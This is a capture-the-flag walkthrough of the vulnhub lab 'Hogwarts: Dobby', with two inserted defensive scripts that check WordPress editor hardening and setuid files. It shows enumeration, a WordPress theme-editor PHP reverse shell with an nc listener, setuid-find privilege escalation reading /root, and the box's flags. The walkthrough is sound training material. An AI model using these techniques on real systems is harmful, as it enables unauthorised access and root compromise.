Hogwarts: Dobby vulnhub writeup

Oline77
3 min readNov 22, 2020


I started by scanning the target machine for any open ports and services running on those ports using the Nmap tool.

First, let’s decode the base64 string that Nmap reported in the http-title.

echo "dG9vIGVhc3kgbm8/IFBvdHRlcg=="|base64 -d
$>too easy no? Potter

Maybe a user…

I decided to check the website hosted on port 80. Looking at the page source, at the very end we see this:

In /alohomora we found this: “Draco’s password is his house ;)”. The box is Harry Potter themed, so maybe the credentials are draco:slytherin.

Let’s run Gobuster:

gobuster dir --url http://<IP>/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js,php,txt,html -t 100

We found a /log directory, let’s check it:

We have a new directory and a password.

This is a base64 string; decoded, it gives ilikesocks. Maybe a password, let’s not forget it.

The /DiagonAlley directory takes us to a WordPress site. Obviously there is a message to decode. I think it’s a Brainfuck string, so we use the site to decode it. It gives a strange message: donn……‹Ÿš§. We will see later if it can help us, but I think it is a rabbit hole.

Let’s start a new Gobuster run on the WordPress site.

We found some standard WordPress paths. We will be interested in /wp-admin.

Since this is a WordPress site, we will run WPScan with the -e u option to enumerate users.

wpscan --url http://<IP>/DiagonAlley/ -e u
Nothing interesting in this scan, but we found two users (draco and Draco), maybe the same user.

We can log in to WordPress with the credentials we found: Draco:slytherin.

Now we upload a reverse shell through the Apariencia > Editor de temas (Appearance > Theme Editor) section. Replace a theme page with a PHP reverse shell, start a listener and refresh the site.
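The foothold above only works because the dashboard theme editor is enabled, which lets any administrator write arbitrary PHP to disk. WordPress disables that editor when wp-config.php defines DISALLOW_FILE_EDIT as true. The script below is an added example (not part of the original writeup) that checks a wp-config.php body for that setting; DISALLOW_FILE_EDIT is a real WordPress constant, but both config files are constructed samples, and the /var/www path in the comment is an assumption.

```shell
#!/bin/sh
# Added example: report whether a WordPress configuration disables the
# in-dashboard theme/plugin editor (Appearance > Theme Editor).

# Constructed sample: a wp-config.php that leaves the editor enabled.
WEAK_CONFIG="<?php
define('DB_NAME', 'wordpress');
define('WP_DEBUG', false);"

# Constructed sample: the same file with the editor disabled.
HARDENED_CONFIG="<?php
define('DB_NAME', 'wordpress');
define('DISALLOW_FILE_EDIT', true);
define('WP_DEBUG', false);"

# file_edit_disabled CONFIG_TEXT
# Exit status 0 when the text contains define('DISALLOW_FILE_EDIT', true)
# (single or double quotes, arbitrary whitespace), 1 otherwise.
file_edit_disabled() {
    printf '%s\n' "$1" | grep -Eq \
        "define\([[:space:]]*['\"]DISALLOW_FILE_EDIT['\"][[:space:]]*,[[:space:]]*true[[:space:]]*\)"
}

# Human-readable verdict for one config body, labelled by NAME.
report() {
    name="$1"
    if file_edit_disabled "$2"; then
        echo "$name: theme editor disabled (DISALLOW_FILE_EDIT=true)"
    else
        echo "$name: theme editor ENABLED - add define('DISALLOW_FILE_EDIT', true);"
    fi
}

report "weak sample" "$WEAK_CONFIG"
report "hardened sample" "$HARDENED_CONFIG"
# On a real host (assumed path): report live "$(cat /var/www/html/wp-config.php)"
```

The check is deliberately a plain text match rather than a PHP parse, so it runs anywhere a shell is available, but it will miss the constant if it is set from an included file or a plugin; treat a miss as "verify manually" rather than "enabled".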

nc -nlvp 6666
The shell works fine.

Upgrade it to an interactive shell with the following command:

/usr/bin/script -qc /bin/bash /dev/null

With cd /home and ls, we found the user dobby.

su to dobby with the password ilikesocks.

In /home/dobby, open flag1.txt with vi, because cat doesn’t work on this box:

flag1{28327a4964cb391d74111a185a5047ad}

Now let’s run this command to find all setuid/setgid files on the system:

find / -type f -perm /6000 -ls 2>/dev/null

We found an interesting one: /usr/bin/find. Let’s check on this great site whether this command can be exploited when it is setuid, and we found one.
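A setuid find is the whole privilege escalation here, and the same `find / -perm /6000` sweep used to discover it is also how a defender spots it. The script below is an added example, not from the original writeup: it compares a setuid/setgid inventory against an allowlist of binaries expected to carry those bits and prints the rest. The inventory and allowlist are constructed samples (the allowlist is an assumption about a typical Debian-style host, not a complete reference); live_inventory() produces the real list on a host.

```shell
#!/bin/sh
# Added example: flag setuid/setgid files that are not on an allowlist.

# Constructed sample standing in for the output of
#   find / -type f -perm /6000
SAMPLE_INVENTORY='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/find
/bin/su'

# Assumed allowlist of binaries that legitimately carry setuid/setgid.
# Build the real one from a known-good image of the same distribution.
ALLOWLIST='/usr/bin/passwd
/usr/bin/sudo
/bin/su
/usr/bin/mount'

# unexpected_suid INVENTORY ALLOWLIST
# Prints every inventory path (one per line) absent from the allowlist.
unexpected_suid() {
    inventory="$1"
    allow="$2"
    printf '%s\n' "$inventory" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        # -x: whole-line match, -F: literal string, -q: status only
        if ! printf '%s\n' "$allow" | grep -qxF -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# Live inventory of setuid/setgid regular files on this host
# (-xdev stays on local filesystems; errors from unreadable dirs are dropped).
live_inventory() {
    find / -xdev -type f -perm /6000 2>/dev/null | sort
}

# Run against the constructed sample; on a real host use "$(live_inventory)".
echo "Unexpected setuid/setgid files:"
unexpected_suid "$SAMPLE_INVENTORY" "$ALLOWLIST"
```

Run periodically and diffed against the previous result, this turns a one-off CTF enumeration step into a detection: a new entry such as /usr/bin/find appearing in the output is exactly the misconfiguration this box relies on.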

First, let’s enumerate the root folder :

find . -exec ls /root/ \; -quit;

There is a proof.txt; open it:

find . -exec more /root/proof.txt \; -quit;

And we have the root flag :

root{63a9f0ea7bb98050796b649e85481845!!}

…well done
